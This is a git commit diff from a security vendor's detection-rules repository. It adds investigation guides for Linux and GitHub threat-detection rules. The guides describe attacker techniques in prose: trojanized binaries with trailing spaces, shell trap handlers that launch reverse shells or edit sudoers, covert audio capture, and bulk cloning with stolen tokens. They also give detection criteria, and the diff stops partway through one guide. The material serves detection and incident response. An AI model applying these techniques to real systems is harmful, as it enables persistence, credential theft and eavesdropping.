Prep for Release 9.3 (#5548)

This commit is contained in:
shashank-elastic
2026-01-12 21:07:07 +05:30
committed by GitHub
parent 8b84c26286
commit 1ce072a4e5
99 changed files with 4599 additions and 48 deletions
@@ -2,7 +2,7 @@
creation_date = "2023/08/24"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
updated_date = "2024/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_mana
language = "eql"
license = "Elastic License v2"
name = "Processes with Trailing Spaces"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Processes with Trailing Spaces
This rule detects execution of binaries whose names end with a space, a Unix-style masquerade that makes a malicious tool visually indistinguishable from a legitimate one and evades default file handling. An attacker pattern is a trojanized clone of ssh, curl, or ps with a trailing space placed in a user-writable PATH directory, then invoked by cron, shell scripts, or launch agents to harvest credentials or stage payloads while blending in.
### Possible investigation steps
- Confirm the binary's presence and trailing space on disk using commands that reveal whitespace (ls -b, find -print0, stat), and compare inode, size, permissions, and mtime against the non-spaced counterpart in the same directory.
- Correlate the event with parent process, effective user, environment (PATH, IFS, aliases), and working directory to determine whether PATH hijacking or script misresolution is being exploited.
- Hash the suspicious executable, check code signing and compiler metadata where applicable, and pivot in threat intel and internal repositories to identify known implants or unauthorized builds.
- Enumerate all directories in PATH for lookalike binaries with whitespace or Unicode homographs, review recent file creations and chmod/chown activity in those paths, and identify the account and host that introduced them.
- Investigate follow-on activity from the same process tree, including network connections, credential access attempts, file writes, and persistence artifacts such as cron entries or macOS LaunchAgents, to determine scope and containment actions.
### False positive analysis
- A legitimate wrapper or init script may use exec -a or setproctitle to set a custom argv[0] with a trailing space for labeling or formatting, causing process.name to end with a space even though the underlying binary is trusted.
- Build or maintenance scripts that fail to trim variables can create and run an executable or symlink whose name includes a trailing space (e.g., when an optional suffix is empty), producing benign events that match this detection.
### Response and remediation
- Terminate the spaced-name process and its parent, stop any cron job or macOS LaunchAgent invoking the spaced executable (e.g., "ssh "), and isolate the host if it initiated outbound connections or prompted for credentials.
- Find and remove or quarantine all executables and symlinks whose filenames end with a space in PATH directories such as ~/bin, /tmp, and project bin paths, using rm -- with exact quoting or null-delimited tools to avoid clobbering the legitimate counterpart.
- Remove persistence and PATH hijacks by deleting cron entries and LaunchAgents referencing the spaced name, restoring PATH for affected users and services to a vetted list, and resetting file ownership and permissions on altered directories.
- Reinstall or restore the legitimate binary from trusted packages or gold images, verify checksums and code signing, update scripts to use absolute paths and trimmed variables, and rotate credentials if the lookalike was a trojan of ssh, curl, or ps.
- Escalate to incident response if the spaced executable resides in system directories (/bin, /usr/bin, /usr/local/bin), runs as root or via sudo, repeatedly respawns after removal, or opens external network connections.
- Harden by enabling file integrity monitoring for filenames with trailing whitespace or Unicode confusables, removing user-writable directories from global PATH and enforcing write protections, configuring cron/launchd with sanitized PATH, and applying noexec or sticky-bit policies on shared temp directories.
"""
risk_score = 21
rule_id = "0c093569-dff9-42b6-87b1-0242d9f7d9b4"
severity = "low"
@@ -27,6 +58,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: Auditd Manager",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2023/08/24"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_mana
language = "eql"
license = "Elastic License v2"
name = "Trap Signals Execution"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Trap Signals Execution
This rule flags use of the shell built-in trap to bind commands to POSIX signals, enabling automatic execution when interrupts like SIGINT, SIGHUP, or SIGTERM occur. Attackers commonly embed traps in bash, zsh, or service scripts so pressing Ctrl+C (SIGINT) or a daemon reload (SIGHUP) silently runs a payload—adding a user to sudoers, planting a setuid helper, or launching a reverse shell—achieving persistence or escalation without a direct command invocation.
### Possible investigation steps
- Pull the full trap command and its arguments plus the parent script path, then read the script to see which signals map to which payloads and whether they perform user, permission, or network actions.
- Determine execution context by user and privilege, TTY/session versus systemd or cron, and whether the shell was invoked with sudo or as root to gauge impact if the trap triggers.
- Correlate telemetry for signal delivery (kill, hangup, termination) to the same process and for immediate follow-on activity such as child process spawns, edits to /etc files, setuid or chmod events, and outbound connections.
- Search the host for other trap definitions in login and init paths (.bashrc, .zshrc, /etc/profile, /etc/*rc, systemd unit scripts, and cron wrappers) to identify persistence or broader tampering.
- Verify legitimacy by comparing the script to package or repository sources and change records, and preserve artifacts (path, hash, mtime, owner) along with shell history and environment for deeper analysis.
### False positive analysis
- Operations or maintenance scripts legitimately declare trap handlers for SIGTERM or SIGHUP to perform cleanup during routine shutdown or reload, producing trap commands with signal arguments that match this detection.
- Interactive shell customization may set a trap on SIGINT (Ctrl+C) to restore terminal settings or print a message on interruption, resulting in benign trap invocations with SIG* arguments.
### Response and remediation
- Isolate the host or TTY session where a trap binds SIGINT/SIGHUP/SIGTERM to commands that write to /etc or open a socket, kill the offending shell and its parent process, and stop/disable any systemd unit or cron wrapper invoking the implicated script path.
- Edit the identified script or rc file (.bashrc, .zshrc, /etc/profile, systemd unit script) to remove or unset the trap handlers, and delete or quarantine any referenced payload such as a reverse-shell binary, sudoers drop-in, or setuid helper.
- Restore altered files from a known-good baseline (e.g., /etc/sudoers, unit .service files, shell RCs), revalidate file ownership and permissions, restart impacted services cleanly, and rotate credentials for users touched by the payload.
- Sweep the host and peers for additional trap definitions by grepping for "trap SIG" in login/init paths and service scripts, and record script path, hash, mtime, and owner to confirm scope and support cleanup.
- Escalate to incident response if the trap executes as root, modifies /etc/sudoers or PAM files, creates setuid files under /usr/bin or /usr/local/bin, or starts a reverse shell to an external IP/port.
- Harden by restricting write access to /etc/*rc and service scripts, enforcing deployment via signed packages, adding audit rules for changes to /etc/sudoers and /etc/profile.d, blocking shells from egress to untrusted networks, and alerting on traps bound to EXIT/DEBUG or signals that invoke privileged actions.
"""
risk_score = 21
rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e"
severity = "low"
@@ -27,6 +58,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: Auditd Manager",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,9 +2,9 @@
creation_date = "2025/07/01"
integration = ["azure"]
maturity = "production"
min_stack_comments = "Bug fix in threshold rules."
min_stack_version = "9.0.0"
updated_date = "2025/12/18"
min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
min_stack_version = "9.1.0"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "GitHub Secret Scanning Disabled"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Secret Scanning Disabled
This rule triggers when secret scanning is disabled on a repository, signaling an attempt to hide exposed tokens, keys, or passwords that can enable lateral movement, persistence, and data exfiltration. An attacker who gains admin or bot access may disable scanning, push a commit embedding plaintext credentials, and modify a workflow to export them via CI jobs, then use those secrets to authenticate to external services or cloud accounts and expand control.
### Possible investigation steps
- Identify the actor (user, bot, or GitHub App), their auth method and source IP, confirm admin privileges, and validate whether the change was planned and approved.
- Immediately re-enable Secret Scanning and Push Protection on the repository and, if possible, enforce them via an organization policy, recording change control and justification.
- Review commits, pull requests, and workflow file changes near the disable timestamp to detect added plaintext credentials, secret files, or code paths that read or export secrets.
- Examine recent GitHub Actions runs, artifacts, and logs for secrets printed, unusual network egress, or jobs using elevated token scopes, and check for newly added or modified repo/org secrets.
- Correlate IdP, cloud, and third-party service logs for authentication or API activity shortly after the disable event, revoking and rotating any credentials suspected to be exposed.
### False positive analysis
- A repository admin temporarily disables Secret Scanning during a planned maintenance or configuration test to address noisy detections or performance issues, then re-enables it, generating a benign disable event.
- Organization-managed templates or automation enforce a settings baseline that disables Secret Scanning for non-code or ephemeral repos (e.g., mirrors, docs, or test sandboxes), causing the event as part of expected governance.
### Response and remediation
- Immediately re-enable Secret Scanning and Push Protection on the affected repository, lock the default branch with "Require pull request reviews" and "Restrict who can push," and temporarily pause GitHub Actions workflows that access repo or org secrets.
- Revert or rewrite commits made while scanning was disabled to remove credentials from files like .env, config.yml, and .github/workflows/*.yml, and delete build artifacts and caches that may contain sensitive values.
- Revoke and rotate exposed credentials by disabling compromised PATs, rotating cloud API keys and service tokens, and updating organization and repository secrets in Settings > Secrets and variables.
- Validate recovery by confirming Secret Scanning and Push Protection are enabled in repository settings, re-running a full secret scan across HEAD, tags, and protected branches, and restoring merges and deployments only after clean results.
- Escalate to incident response if the actor is unknown or unauthorized, if plaintext secrets appear in commits or workflow logs, or if external authentications use repo-linked credentials within 24 hours of the disable event.
- Harden by enforcing org-wide policies requiring Secret Scanning and Push Protection for all repositories, adding repository rulesets to require status checks and pull request reviews before merging, and limiting Actions token permissions with protected environments and branch protections.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "GitHub Private Repository Turned Public"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Private Repository Turned Public
This rule flags when a previously private repository is made public, a high-risk change that can expose proprietary code, credentials, and internal documentation. Attackers who hijack a maintainer's account often flip visibility via the UI or API, then immediately fork or mirror the repo to an external account to retain access and harvest embedded secrets even if the org reverts the change.
### Possible investigation steps
- Identify the actor and authentication method used for the visibility change, verify their repository role, and confirm the action against an approved change request or ticket.
- Pull a time-bounded audit trail around the event for the actor and repository to surface related risky operations such as forking, transfers, collaborator additions, webhook edits, branch protection changes, or archive downloads.
- Enumerate forks, mirrors, stars, and watchers added after the change via the repository network graph and correlate with external accounts or suspicious clusters.
- Inspect GitHub Actions runs, deployments, and webhooks triggered post-change for workflows that export code or secrets to external destinations.
- Perform rapid secret scanning across the repository history and HEAD, triage any exposed credentials, and initiate rotation while mapping impacted services and environments.
### False positive analysis
- A planned, approved open-source release where a maintainer intentionally flips a sanitized repository from private to public as part of a documented change.
- Bulk visibility changes during an organization-wide cleanup or migration that publishes templates, sample repos, or empty scaffolds, executed by an authorized service account.
### Response and remediation
- Immediately revert the repository to private, remove outside collaborators, lock access to the core maintainers team, disable GitHub Actions and webhooks, and delete any release assets or packages published during the exposure window.
- Enumerate new forks, mirrors, stars, and watchers created after the visibility change and file takedown requests with GitHub Trust & Safety for unauthorized public copies while removing any deploy keys and uninstalling suspicious GitHub App installations added around the event.
- Run a rapid secret scan across the repository history and HEAD, rotate exposed credentials (cloud keys, API tokens, SSH keys), invalidate compromised service accounts, and purge cached artifacts or container images built from the public commit range.
- Restore secure settings from baseline by re-applying branch protection rules, CODEOWNERS, required reviews, signed commits, and protected environments, then re-enable workflows only after reviewing job steps and outputs for any export of code or secrets.
- Escalate to Security IR and Legal if the actor denies making the change, the repo network graph shows new public forks under unknown accounts, regulated data is present, or external users downloaded source zips or release archives during the public period.
- Restrict who can change repository visibility to organization owners, enforce SSO and 2FA for maintainers, disable forking of private repositories, limit Actions to trusted runners and verified actions, and enable secret scanning with push protection across the organization.
"""
risk_score = 21
rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298"
severity = "low"
@@ -25,6 +56,7 @@ tags = [
"Tactic: Exfiltration",
"Tactic: Impact",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "GitHub Exfiltration via High Number of Repository Clones by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Exfiltration via High Number of Repository Clones by User
This rule flags a single user rapidly cloning dozens of repositories, a strong indicator of bulk source code exfiltration. Mass cloning enables quick siphoning of proprietary code, embedded secrets, and build artifacts across teams before defenses can respond. A typical pattern is a stolen personal access token used in a script to enumerate org repositories and clone them in rapid succession from a CI runner or cloud VM, including private and internal repos, to stage data for off-platform transfer.
### Possible investigation steps
- Validate whether the actor is a known automation or service account with a documented need to mass-clone, and quickly confirm intent with the account owner and affected repo admins.
- Enumerate the cloned repositories and their visibility, deprioritizing activity dominated by public repos while fast-tracking private/internal codebases with sensitive content across orgs.
- Pivot on the token identifier to determine the token owner, scopes, and creation/last-use details, compare to normal usage patterns, and revoke/reset credentials if anomalous.
- Analyze the user agent and agent identifier to attribute the activity to a specific host or CI runner, correlating with pipeline logs and login locations/times for anomalies.
- Correlate with endpoint/network telemetry from the originating host for large outbound transfers, external Git remotes, or bulk archiving indicating off-platform exfiltration following the clones.
### False positive analysis
- A developer rebuilding a workstation or creating an approved local mirror may legitimately clone dozens of repositories in a short window, especially when activity is dominated by public or low-sensitivity repos.
- A shared automation/service account running scheduled builds or org-wide maintenance tasks can trigger fresh clones across many repositories due to pipeline configuration or cache resets, inflating counts without exfiltration intent.
### Response and remediation
- Immediately revoke the GitHub token used for the clones, force sign out, require password reset and 2FA re-verification for the user, and suspend the account if unauthorized.
- Block and quarantine the originating host or CI runner by revoking its runner registration, removing its SSH keys/credentials, and firewalling its IP until imaged.
- On the cloned private/internal repositories, remove the user from teams, rotate or disable deploy keys and GitHub App installations, and enforce SAML SSO.
- Rotate repository and organization secrets present in those repos (Actions secrets, PATs, SSH keys, cloud access keys) and invalidate any secrets found in commit history.
- Recover by restoring only minimal access after owner approval, issuing a new fine-grained PAT with least privilege and expiry, and re-enabling builds while monitoring for further clone bursts.
- Escalate to incident response leadership and Legal if any private or export-controlled repos were cloned or cloning continues post-revocation, and harden by enforcing org-wide SSO, disallowing classic PATs, IP allowlisting for PAT use, enabling secret scanning with push protection, and alerting on burst git clone patterns from runners and unusual user agents.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -28,6 +59,7 @@ tags = [
"Use Case: Threat Detection",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "High Number of Closed Pull Requests by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating High Number of Closed Pull Requests by User
This rule flags a single user rapidly closing many pull requests in a short window, a disruptive pattern that suppresses review history, delays releases, and masks unauthorized changes. An attacker with stolen maintainer access mass-closes pull requests across multiple repositories, then force-pushes branches and opens new pull requests that sidestep earlier review threads, making malicious edits appear routine amid churn.
### Possible investigation steps
- Determine if the actor is a bot or sanctioned maintenance by confirming account type, scheduled workflows, and change advisories from repo/org owners.
- Open a sample of the closed PRs to review comments, labels, linked issues, and whether closure coincided with branch deletions, force-pushes, or unusual commit history in the target branches.
- Correlate the closure burst with audit events for permission changes, role assignments, repository settings edits, or protection rule modifications to detect potential sabotage.
- Validate the actor's IPs, geolocation, and user agents against baselines and check for recent PAT creations, OAuth app grants, or SSO anomalies indicating credential theft.
- Identify whether closed PRs were immediately replaced by new PRs carrying similar diffs that bypass prior review threads and required checks, and verify branch protection remained enforced.
### False positive analysis
- A maintainer or org-owned bot performs scheduled backlog hygiene, closing stale, duplicate, or superseded PRs across multiple repositories after a default branch rename or policy update, resulting in a high closure count from one account.
- During a planned migration or archival, a release manager closes PRs tied to deprecated branches and consolidates work into new targets, legitimately generating a burst of closures attributed to a single user.
### Response and remediation
- Immediately contain by removing the user from teams with Triage/Write permissions on affected repositories, revoking their personal access tokens from Tokens & keys, and tightening branch protection by disallowing force-pushes and restricting who can push to main and release branches.
- Trigger escalation to Security Incident Response if closed pull requests span more than five repositories within one hour, coincide with branch deletions or forced pushes, or originate from a new user agent/IP, and disable the account at the identity provider while contacting GitHub Support.
- Eradicate impact by reopening legitimate PRs via each closed PR URL, using Restore branch or recreating the head branch from the last known commit SHA, and reapplying required labels and reviewers.
- Recover repository state by comparing diffs of closed PRs to any newly opened PRs by the same user, reverting unauthorized commits in target branches with git revert, and re-running required status checks before merging.
- Harden controls by enforcing branch protection rules (require two approvals, restrict who can dismiss reviews, require signed commits), enabling CODEOWNERS for critical paths, and turning off Allow deletions on default and release branches.
- Prevent recurrence by disabling classic PATs and requiring short-lived fine-grained PATs, revoking unusual OAuth app grants, mandating SSO with hardware-backed MFA, and installing a GitHub App/Action that notifies on PR closures with PR URLs, repos, and branches and requires a reason-coded label per policy.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "Several Failed Protected Branch Force Pushes by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Several Failed Protected Branch Force Pushes by User
This rule flags a single user generating multiple failed force push attempts to protected branches within a short span, indicating attempts to rewrite commit history and bypass branch protections. An attacker with a compromised maintainer role repeatedly tries to roll back a security fix, delete prior commits, and erase history entries before pushing a malicious revision. This activity threatens code integrity, disrupts pipelines, and can propagate harmful changes across repositories.
### Possible investigation steps
- Pull audit entries for the rejected updates to confirm the rejection reasons and the exact org/repo/branch targets, then reconstruct the timeline and sequence of attempts.
- Verify the user's current and recent permissions, team membership, and role changes, and confirm whether any admin or ownership transfers occurred before the attempts.
- Correlate the attempts with authentication and token activity (SSO logins, PAT/SSH key usage, IP/device fingerprints, geo), flagging any new or unusual sources.
- Review branch protection settings and recent edits (require status checks, linear history, admin enforcement, force push exemptions) to detect policy tampering or misconfiguration.
- Identify the specific commits the force pushes sought to overwrite by diffing the attempted ref against the protected branch head, prioritizing impacts to security fixes, release branches, or signed commits.
### False positive analysis
- During a repository migration or history cleanup, a maintainer runs a local script that loops through branches and tries to push rewritten commits with --force, but newly tightened branch protection rejects each attempt, resulting in multiple failures.
- A developer who previously had a force-push exemption on a protected release branch loses that permission during a role or team change and continues their usual rebase-and-force-push workflow, causing several rapid rejected ref updates.
### Response and remediation
- Immediately block the user in the GitHub organization, revoke all active personal access tokens and SSH keys from their account, and force sign-out to stop further push attempts.
- On each affected repository and branch (e.g., main, release/*), remove any force-push exemptions, enable “Include administrators,” require signed commits and status checks, and restrict push access to specific teams.
- Purge staging artifacts by deleting any branches or tags the user created around the attempts, rotate the user's password and regenerate PATs/SSH keys, and remove newly registered keys or OAuth apps added during the window.
- Validate recovery by confirming the protected branch HEAD matches the last known good signed commit SHA, re-running CI for impacted repos, and creating a restore point tag for rapid rollback.
- Escalate to incident response if any attempts targeted main or release branches, originated from a newly created PAT/SSH key or an unrecognized IP/device, or the user holds repo admin/organization owner rights.
- Harden long term by enforcing org-wide 2FA/SSO, removing all standing force-push exemptions, requiring CODEOWNERS approvals on protected branches, and enabling audit alerts for branch protection edits and new credential creation.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -30,6 +61,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "High Number of Protected Branch Force Pushes by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating High Number of Protected Branch Force Pushes by User
This rule flags a single user performing many force pushes to protected branches in a short window, signaling aggressive history rewrites on critical repositories. Such activity can erase commits, hide unauthorized changes, and disrupt builds or releases, indicating potential data destruction or sabotage. Example: a compromised maintainer acquires elevated access and repeatedly force-pushes rewritten history to the main branch to purge prior commits, remove security fixes, and introduce a backdoor while bypassing merge protections.
### Possible investigation steps
- Verify the user's current and recent org/repo roles and bypass permissions, along with any recent elevation, SSO changes, or new PAT/GitHub App installations linked to the account.
- Enumerate impacted repositories and protected branches, then reconstruct the overwritten history by comparing before/after SHAs from audit logs or local mirrors to determine what commits were removed or rewritten.
- Assess intent and legitimacy by contacting repo owners and checking change tickets or maintenance windows for planned history rewrites, and suspend override permissions if unplanned while preserving forensic evidence.
- Analyze sign-in and authentication telemetry around the events (IP, geo, MFA status, device, OAuth/PAT/App identifiers, off-hours) to spot account compromise indicators and pivot to other activity by the same token.
- Review diffs of the resulting branch heads and CI/CD artifacts to detect malicious changes (e.g., removed security fixes, inserted secrets/backdoors), and check for anomalous releases or workflows triggered by the rewritten commits.
### False positive analysis
- An authorized maintainer conducts a planned history rewrite (rebases/resets to remove problematic commits) across protected branches in multiple repositories, legitimately invoking policy overrides and issuing many force pushes in quick succession.
- A release owner executes an emergency rollback by resetting protected branches to a known-good commit across several repositories, causing repeated, intentional force pushes and protected-branch overrides.
### Response and remediation
- Immediately contain by removing the user from repo admin/maintain teams, revoking all active PATs/OAuth/App tokens linked to the account, and updating branch protection on affected branches to disallow force pushes and restrict pushes to a small trusted group.
- Freeze each impacted protected branch by creating an annotated tag at the last known-good commit SHA prior to the force pushes and temporarily pausing CI/CD workflows that build from those branch heads.
- Recover by restoring each branch head to the last known-good commit or signed tag from a trusted mirror/backup, verifying the target SHA, and re-enabling protections and required status checks after integrity confirmation.
- Eradicate unauthorized changes by diffing the pre-override and post-override branch heads, reverting malicious edits, rotating repository secrets referenced in code/workflows, and removing suspicious GitHub Apps installed by the user.
- Escalate to incident response and legal if any overwritten history includes production release branches or signed tags, if the user denies authorization, or if pushes originated from a new token/App unknown to repo owners.
- Harden by enforcing rulesets that block force pushes and require linear history on main and release/* branches, enabling CODEOWNERS-required reviews and signed commits, limiting bypass permissions to a small admin group, and using deploy keys or CI bots with short-lived tokens for pushes.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -30,6 +61,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "New GitHub Personal Access Token (PAT) Added"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating New GitHub Personal Access Token (PAT) Added
This alert triggers when someone creates and authorizes a new GitHub personal access token, signaling a fresh long-lived credential that outlasts sessions and enables broad API access. A common abuse path: after compromising a developer account, the adversary mints a PAT with repo and organization scopes and uses it from an external host to enumerate and clone private repositories via the API.
### Possible investigation steps
- Retrieve token details (type fine-grained vs classic, scopes, repository/org binding, and expiration) and verify they match the user's role and least-privilege expectations.
- Correlate the creation IP, geolocation, and user agent with the user's recent login history and corporate network ranges to identify anomalous origin.
- Determine whether the token is SSO-enforced and organization-scoped; lack of SSO or broad classic scopes increases risk and warrants expedited review.
- Pivot to recent Git and API events by this actor since the token was created to see private repo enumeration/clones or org/admin actions indicating misuse.
- Check for concurrent account security changes (2FA status modifications, new SSH/GPG keys, email/password changes, or OAuth app grants) that suggest account takeover and escalate if present.
### False positive analysis
- A developer performs planned token rotation or migrates from a classic to a fine-grained PAT to comply with expiration and least-privilege policies, generating a legitimate personal_access_token.access_granted creation event.
- Expected onboarding or maintenance activities create PATs for service or automation use with scoped repository access and set expiration, producing anticipated alerts from known corporate locations.
### Response and remediation
- Revoke the specific PAT referenced in the alert via GitHub UI or API immediately, and temporarily lock the user account if the token's origin, scopes, or target repositories are not expected.
- If any activity is observed with this PAT, rotate repository and organization secrets, remove newly added deploy keys and suspicious OAuth app grants, and strip unauthorized collaborator or team role changes.
- Force a password reset for the account owner, invalidate active sessions, require fresh 2FA re-enrollment, and delete any other nonessential PATs before restoring normal access.
- Review audit and repository logs for API calls authenticated with this PAT since its creation, block offending source IPs in network controls, and enable GitHub IP allow lists or SSO enforcement to restrict token use to trusted contexts.
- Escalate to incident response if the PAT has admin or organization owner scopes, was created from an unfamiliar location or device, or was used to clone private repositories or change security settings.
- Harden going forward by enforcing fine-grained, expiring, SSO-enforced PATs, disabling classic tokens at the organization, requiring approval for new PATs, and migrating automation to GitHub Apps with least-privilege permissions.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Tactic: Persistence",
"Tactic: Credential Access",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -19,6 +19,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Audio Recording Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Audio Recording Activity Detected
This rule flags executions of Linux audio-recording tools (arecord, parec, pw-record, ecasound, pw-cat -r, ffmpeg) started by uncommon parent processes, signaling potential covert microphone capture. Attackers often drop a systemd service or cron job that silently invokes arecord or ffmpeg to record from default PulseAudio/PipeWire devices and stash WAV/MP3 files under user directories or stream them to a remote host. Capturing ambient audio can reveal passwords, meeting content, and sensitive conversations, aiding reconnaissance and espionage.
### Possible investigation steps
- Examine the full process tree and session context (parent/grandparent, controlling TTY, logged-in user) to determine whether launch came from an expected desktop workflow versus non-interactive origins like cron, systemd, or ssh.
- Parse the command line to identify input device and output target, then hunt for created artifacts (WAV/MP3/OGG) under common stash paths (~/.cache, ~/.local/share, /tmp, /var/tmp, hidden directories) and verify timestamps and owner.
- If the command indicates streaming or piping, inspect recent outbound network connections and DNS from the process/user for RTMP/HTTP/SFTP endpoints and correlate with firewall or EDR flow logs to detect exfiltration.
- Check for persistence mechanisms that could re-invoke the recorder, including systemd user/system units and timers, cron/anacron entries, and shell scripts in autostart paths, and disable or quarantine any suspicious items.
- Review audio subsystem and device access evidence (audit logs for open/read on /dev/snd/* and PipeWire/PulseAudio logs showing record nodes) to confirm capture and identify the device and scope.
### False positive analysis
- ffmpeg is executed with -i to read an existing media file for transcode or audio extraction, not to capture from a microphone, which satisfies the rule conditions but is routine multimedia processing.
